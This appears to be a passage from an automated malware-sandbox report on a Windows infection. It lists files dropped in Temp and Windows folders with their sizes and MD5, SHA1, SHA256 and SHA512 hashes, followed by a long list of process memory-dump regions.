c83ea72877981be2d651f27b0b56efec

SHA1
8d79c3cd3d04165b5cd5c43d6f628359940709a7

SHA256
13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482

SHA512
d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

Download Submit
C:\Users\Admin\AppData\Local\Temp\10105110101\08b7add333.exe

Filesize
4.5MB

MD5
96dd38daadfd80cf699a8c087b581ab9

SHA1
ccea87fbad5d9fdea11ecedfd7f3d0b2d2ff3b2c

SHA256
ad659d3cd67b4c566ada6bc6dfbeece67e5b1941585fbc480bdd80daf290a110

SHA512
9862debc204be49700c1025ab9556a2b082890fae9e43ec9b7c7d41ed1db801601e48b51c755679b4035a4af7019b159451bc356769bd432b1173c15a10423ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\10105120101\bc0ffaf002.exe

Filesize
1.8MB

MD5
bde9a6abcb6323c95e4912af1dec9174

SHA1
d732600d2bd0c05fbe4eb5e0f5320e1b45e7cc6a

SHA256
c374a12d72f69efe4f1df4b8a40efdf0b3a3ff7c82d1e6f246ed32181701f699

SHA512
dc4005df7bac77f96941b632a3cf18ace120b0b70a8d0749e5d657ac8f19fe4864bb9dc93e6c96dd06ce7036c7cf9fcb66cd56516a73d75992c2f17a53a2e2c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\10105130101\1682315e29.exe

Filesize
3.0MB

MD5
54b30d5072b09ae0b55ca89c3d6cea5f

SHA1
22459531f94d2c64f9adf316a4aa1e2c63ef8fe5

SHA256
4b2bb17bfd3ec355a70605cb5a1971d098ccd1f92f0a47386e9166b223bb551f

SHA512
5bdba7bc41d20c515bd58fcb7ceb67feadbd582c4ffeec426e1e370d105dde08c9d7f6ecf362066accc03bd80ebe94ccea7ad284d0e622e449dfe0d77272ff5c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10105140101\c38bb66176.exe

Filesize
3.1MB

MD5
fb8a11382106b0ef3454fc1aa5a86c50

SHA1
f41d205674642f6a335ba9e90d620d20eb2eaf7c

SHA256
086f8bc32eddaa4e947338c087f677b1a78da8f7fc4604d0d0519c093e38f7f4

SHA512
6190e5830f82fdf19bef61a918b4123f1fa45828a7937e682fc80892d3771eef56a4989185261d9b59af72d4edb08e3b15313170dca1baf6e5cc2e643e0e2bb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\10105150101\cc9c0966b2.exe

Filesize
1.8MB

MD5
0824d5f9638e1fed7aea21a97f70f38c

SHA1
83aead23fff28d92a28748702d8329818483c6bc

SHA256
6f2daaadec4daf489f7a5f923ecf0ef5b7a0af365d4af7e36040904f68545a90

SHA512
c86e43dac2b620c3d3465c0e9a9c78e72293881cf44b2e5c161c4d6d2ffe601e275bbc651e4a02e1f71f4bd2dc7df0e54248a7f2dc7756696cd42099186953aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\10105160101\0764c3a87d.exe

Filesize
947KB

MD5
28f3e4c645b836fe6b7893752b37edcb

SHA1
af8e67a82648f1cb435ca22d26656fcad6bec9d6

SHA256
94757246933bf308c399fc5a46cb74a9203f5940de0c1724cdc9a01ac32d7aef

SHA512
d00eb74351597901d3feccedf26de34221ef6c08b5aa40b3f2d1669ef90ec0fa2ee935fad71fade353d5e889c21c7ef2bb270793ed19a2dd80ceae87f65181f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmcoGUujt.hta

Filesize
717B

MD5
acb879e4794270e7d5361192db58c129

SHA1
360d110225686c808b4ec46cf4c1122d97763d71

SHA256
eca3a4f6f4fa6a5ca9549db1b51a55705cddd72cea39b8b3e84e5e61353c950f

SHA512
ed14762de6d949d52fd74071c966a96bc8911990162377469040f18f63b43335e9d30a09b455457218c6d89ae7c4de18b9f872bf62f90ab08d3faeac22e76e5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar9D6F.tmp

Filesize
183KB

MD5
109cab5505f5e065b63d01361467a83b

SHA1
4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

SHA256
ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

SHA512
753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

Filesize
1.8MB

MD5
a8b6c4d692ab95e6a154ea2a6e5ba085

SHA1
64d765440ca4cb5f3e559dfbb4364aabc9608765

SHA256
0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3

SHA512
03c18afb274d13fbcbe42b8bce86e3ab4850a72d318e970e409fc3c932faca58dd3b19db43b80cd4c88c70ddf1ba6a7ae7a385542823e13ffee2e613c3a1229c

Download Submit
C:\Users\Admin\AppData\Local\Temp\e5235c8

Filesize
5.5MB

MD5
c27632c3b802444239808f860019cf64

SHA1
6551168ef484746a2c6b17db514cadbf3f2f6588

SHA256
5308a462f114b8f5ece10098f092ffcd398f71410a61ae9374584774eede54d0

SHA512
f74200831e56d2ea649b22480e241a01c52dcc42a245f38dbb8738ee2c0ea260e8b2299109c319ec57b790107928f8468719b7dc5491f7083dd0e3dc41fc0213

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a41e2928333b779c1592ca879a36b0cb

SHA1
d98b3b35597a2f70e63822ad74b4b6939e42d734

SHA256
7c7971ab0addb8a3cf851f913f1950343fd9b61b7050916bf595799e8278ab0f

SHA512
1dce5760d1069137816eb5f6765b05ff476e1b83fe33a5abe90324273b6b28ae71b0bf5b945486ee4c96832b464906b248a3bba31438128fa666500735709b5e

Download Submit
C:\Windows\Temp\{EBF13E6F-84B0-4CB1-876A-619C4E46A136}\.ba\DuiLib_u.dll

Filesize
860KB

MD5
83495e5db2654bcec3948ee486424599

SHA1
8a86af21864f565567cc4cc1f021f08b2e9febaa

SHA256
e770be8fba337cc01e24c7f059368526a804d2af64136a39bb84adeebcf9cfbc

SHA512
b4dbdfff0501fb3ba912556a25a64da38d3872bc31c94cc2395d6567b786cbbe104fd6178f019f8efba08dc5abcd964616a99d886b74aa80014b1c09ba7e9c41

Download Submit
C:\Windows\Temp\{EBF13E6F-84B0-4CB1-876A-619C4E46A136}\.ba\MSVCP140.dll

Filesize
437KB

MD5
e9f00dd8746712610706cbeffd8df0bd

SHA1
5004d98c89a40ebf35f51407553e38e5ca16fb98

SHA256
4cb882621a3d1c6283570447f842801b396db1b3dcd2e01c2f7002efd66a0a97

SHA512
4d1ce1fc92cea60859b27ca95ca1d1a7c2bec4e2356f87659a69bab9c1befa7a94a2c64669cef1c9dadf9d38ab77e836fe69acdda0f95fa1b32cba9e8c6bb554

Download Submit
C:\Windows\Temp\{EBF13E6F-84B0-4CB1-876A-619C4E46A136}\.ba\diorama.json

Filesize
55KB

MD5
61947293abc79f5e003ac42d9b7489f4

SHA1
9386c10a6441a395385007130f1aa6916b22881a

SHA256
57414bda77d468f6573672aaa7b1b68e38ae511ab5be187c227232a054c257bb

SHA512
6c90d23c9ce0a3d2880c7e0bf056df32de9701ce5e3c210967e04a67c7730fc9b341ed46641390cd49a645c49c6c6ab7a63710df0814ae75cfb32d7fef43903f

Download Submit
C:\Windows\Temp\{EBF13E6F-84B0-4CB1-876A-619C4E46A136}\.ba\fizgig.avi

Filesize
4.4MB

MD5
5d66fb6cc0be6e19ce2ac0e06c46a8cc

SHA1
90aeb2f3c4ec474779d2c92d3880dcd4611c0ea8

SHA256
e5b81417ed9c35e57a92e739e1a64aedd83edb3cc759b6a18b1a637bcfc3b8f2

SHA512
1fb73e90adf0f20d6061135d01fa45674dbcd67791978a663911e69fa11ea93561328a93c8fe582b33cabb2096ad15cc9daa46eb4d07895a70134e1a5b81e68b

Download Submit
\Users\Admin\AppData\Local\TempKWU4HQYTP3YKRSPXDCTBVXMENMNRNFI0.EXE

Filesize
1.8MB

MD5
895d364d98674fc39c6c2ca1607c189c

SHA1
089147d7501025cfc4f8b84305dfd211c8708be4

SHA256
43374f0238ae8b778ff340a81a654269894b69815eae179af6634bcf08c96301

SHA512
56a3e90dc994f061431c5173021cc234cacb37e3cdb1df5f073c92d90fff7495385277da29abf839b77b4cbcf36ca318a2a83f6fbfd484670527e97f45be4d9d

Download Submit
\Users\Admin\AppData\Local\Temp\Syncsign_v1.exe

Filesize
2.3MB

MD5
967f4470627f823f4d7981e511c9824f

SHA1
416501b096df80ddc49f4144c3832cf2cadb9cb2

SHA256
b22bf1210b5fd173a210ebfa9092390aa0513c41e1914cbe161eb547f049ef91

SHA512
8883ead428c9d4b415046de9f8398aa1f65ae81fe7945a840c822620e18f6f9930cce2e10acff3b5da8b9c817ade3dabc1de576cbd255087267f77341900a41c

Download Submit
\Windows\Temp\{A2163232-208D-4EA2-8B9D-C476A64F4582}\.cr\Y87Oyyz.exe

Filesize
5.6MB

MD5
958c9e0114b96e568a2cc7f44fed29d8

SHA1
bfe95d84a6243da42e0e0e89a7c6a5e87ce96487

SHA256
935aac20de79946cbcd537f5c15f166449bb218bd41f01f8130ff1b795421d8a

SHA512
8ed92a2f09cca8364727a9f057f7fcc42986d696b6c4e77b2695c0694b05046c92679cb13ba8926aeabf59afbbdd28b0075554cab487d5cf883bde6815c6d592

Download Submit
\Windows\Temp\{EBF13E6F-84B0-4CB1-876A-619C4E46A136}\.ba\Centre.dll

Filesize
650KB

MD5
682f74b9221d299109a3d668d6c49613

SHA1
93b98dbe3fbe1830f9de24d1c36ebc7d7da3738b

SHA256
f4ffce0b075ea7f473e6c8f04688b3abc0df5bf56e3ff4497fece42ab714d3b5

SHA512
d2995305a2452363932491f25dc0a51a1d2daf2f62d1feb3290958604981dd2a6f77c88d9ea7215d188f1e6898b9c6ed1686c1a2437b84be38a9282c325c8d8f

Download Submit
\Windows\Temp\{EBF13E6F-84B0-4CB1-876A-619C4E46A136}\.ba\SplashWin.exe

Filesize
446KB

MD5
4d20b83562eec3660e45027ad56fb444

SHA1
ff6134c34500a8f8e5881e6a34263e5796f83667

SHA256
c5e650b331fa5292872fdaede3a75c8167a0f1280ce0cd3d58b880d23854bdb1

SHA512
718bd66fcff80b8008a4523d88bd726cdbc95e6e7bdb3f50e337e291294505ed54e6f5995d431968b85415e96f6f7ed37381ca021401ad57fda3b08a1f0c27f4

Download Submit
\Windows\Temp\{EBF13E6F-84B0-4CB1-876A-619C4E46A136}\.ba\vcruntime140.dll

Filesize
74KB

MD5
a554e4f1addc0c2c4ebb93d66b790796

SHA1
9fbd1d222da47240db92cd6c50625eb0cf650f61

SHA256
e610cdac0a37147919032d0d723b967276c217ff06ea402f098696ab4112512a

SHA512
5f3253f071da3e0110def888682d255186f2e2a30a8480791c0cad74029420033b5c90f818ae845b5f041ee4005f6de174a687aca8f858371026423f017902cc

Download Submit
memory/1068-101-0x0000000073E50000-0x0000000073FC4000-memory.dmp

Filesize
1.5MB

Download
memory/1068-89-0x0000000073E50000-0x0000000073FC4000-memory.dmp

Filesize
1.5MB

Download
memory/1068-90-0x0000000077B60000-0x0000000077D09000-memory.dmp

Filesize
1.7MB

Download
memory/1220-105-0x0000000077B60000-0x0000000077D09000-memory.dmp

Filesize
1.7MB

Download
memory/1220-153-0x0000000073E50000-0x0000000073FC4000-memory.dmp

Filesize
1.5MB

Download
memory/1332-462-0x0000000000110000-0x00000000005A6000-memory.dmp

Filesize
4.6MB

Download
memory/1332-518-0x0000000000110000-0x00000000005A6000-memory.dmp

Filesize
4.6MB

Download
memory/1364-243-0x0000000000D70000-0x0000000000D82000-memory.dmp

Filesize
72KB

Download
memory/1364-244-0x00000000003D0000-0x00000000003E0000-memory.dmp

Filesize
64KB

Download
memory/1456-551-0x0000000000E90000-0x0000000001548000-memory.dmp

Filesize
6.7MB

Download
memory/1548-256-0x0000000000D10000-0x00000000011CD000-memory.dmp

Filesize
4.7MB

Download
memory/1548-261-0x0000000000D10000-0x00000000011CD000-memory.dmp

Filesize
4.7MB

Download
memory/1608-385-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/1616-254-0x0000000006430000-0x00000000068ED000-memory.dmp

Filesize
4.7MB

Download
memory/1616-253-0x0000000006430000-0x00000000068ED000-memory.dmp

Filesize
4.7MB

Download
memory/1876-384-0x0000000000270000-0x0000000000EB5000-memory.dmp

Filesize
12.3MB

Download
memory/1876-382-0x0000000000270000-0x0000000000EB5000-memory.dmp

Filesize
12.3MB

Download
memory/1880-162-0x0000000000160000-0x0000000000485000-memory.dmp

Filesize
3.1MB

Download
memory/1880-161-0x0000000000160000-0x0000000000485000-memory.dmp

Filesize
3.1MB

Download
memory/1880-157-0x000007FFFFFDE000-0x000007FFFFFDF000-memory.dmp

Filesize
4KB

Download
memory/1880-158-0x000007FFFFFDE000-0x000007FFFFFDF000-memory.dmp

Filesize
4KB

Download
memory/1880-380-0x000000013FB50000-0x000000013FFDB000-memory.dmp

Filesize
4.5MB

Download
memory/1892-314-0x0000000000C80000-0x0000000000CF8000-memory.dmp

Filesize
480KB

Download
memory/2036-320-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/2036-318-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/2036-322-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/2036-324-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/2036-326-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/2036-327-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/2036-328-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/2036-316-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/2092-332-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2092-334-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2092-340-0x0000000010000000-0x000000001001C000-memory.dmp

Filesize
112KB

Download
memory/2140-273-0x00000000003D0000-0x000000000088D000-memory.dmp

Filesize
4.7MB

Download
memory/2140-271-0x00000000003D0000-0x000000000088D000-memory.dmp

Filesize
4.7MB

Download
memory/2292-68-0x0000000073FD0000-0x0000000074144000-memory.dmp

Filesize
1.5MB

Download
memory/2292-69-0x0000000077B60000-0x0000000077D09000-memory.dmp

Filesize
1.7MB

Download
memory/2388-536-0x00000000001D0000-0x00000000004E4000-memory.dmp

Filesize
3.1MB

Download
memory/2468-533-0x0000000000C70000-0x0000000000F73000-memory.dmp

Filesize
3.0MB

Download
memory/2468-505-0x0000000000C70000-0x0000000000F73000-memory.dmp

Filesize
3.0MB

Download
memory/2780-299-0x0000000002720000-0x0000000002728000-memory.dmp

Filesize
32KB

Download
memory/2780-298-0x000000001B6A0000-0x000000001B982000-memory.dmp

Filesize
2.9MB

Download
memory/2820-331-0x00000000003A0000-0x0000000000D8D000-memory.dmp

Filesize
9.9MB

Download
memory/2820-291-0x00000000003A0000-0x0000000000D8D000-memory.dmp

Filesize
9.9MB

Download
memory/2820-335-0x00000000003A0000-0x0000000000D8D000-memory.dmp

Filesize
9.9MB

Download
memory/2820-330-0x00000000003A0000-0x0000000000D8D000-memory.dmp

Filesize
9.9MB

Download
memory/2956-365-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-191-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-538-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-259-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-164-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-100-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-336-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-104-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-25-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-357-0x0000000006840000-0x0000000007485000-memory.dmp

Filesize
12.3MB

Download
memory/2956-356-0x0000000006840000-0x0000000007485000-memory.dmp

Filesize
12.3MB

Download
memory/2956-24-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-289-0x0000000006840000-0x000000000722D000-memory.dmp

Filesize
9.9MB

Download
memory/2956-23-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-379-0x0000000006840000-0x0000000007485000-memory.dmp

Filesize
12.3MB

Download
memory/2956-151-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-159-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-329-0x0000000006840000-0x000000000722D000-memory.dmp

Filesize
9.9MB

Download
memory/2956-163-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-22-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-20-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-19-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-446-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-300-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-26-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-288-0x0000000006840000-0x000000000722D000-memory.dmp

Filesize
9.9MB

Download
memory/2956-504-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2956-18-0x0000000001050000-0x0000000001508000-memory.dmp

Filesize
4.7MB

Download
memory/2988-9-0x0000000001280000-0x0000000001738000-memory.dmp

Filesize
4.7MB

Download
memory/2988-16-0x0000000001280000-0x0000000001738000-memory.dmp

Filesize
4.7MB

Download
memory/2988-14-0x0000000006F50000-0x0000000007408000-memory.dmp

Filesize
4.7MB

Download
memory/2988-0-0x0000000001280000-0x0000000001738000-memory.dmp

Filesize
4.7MB

Download
memory/2988-4-0x0000000001280000-0x0000000001738000-memory.dmp

Filesize
4.7MB

Download
memory/2988-3-0x0000000001280000-0x0000000001738000-memory.dmp

Filesize
4.7MB

Download
memory/2988-2-0x0000000001281000-0x00000000012AF000-memory.dmp

Filesize
184KB

Download
memory/2988-1-0x0000000077D50000-0x0000000077D52000-memory.dmp

Filesize
8KB

Download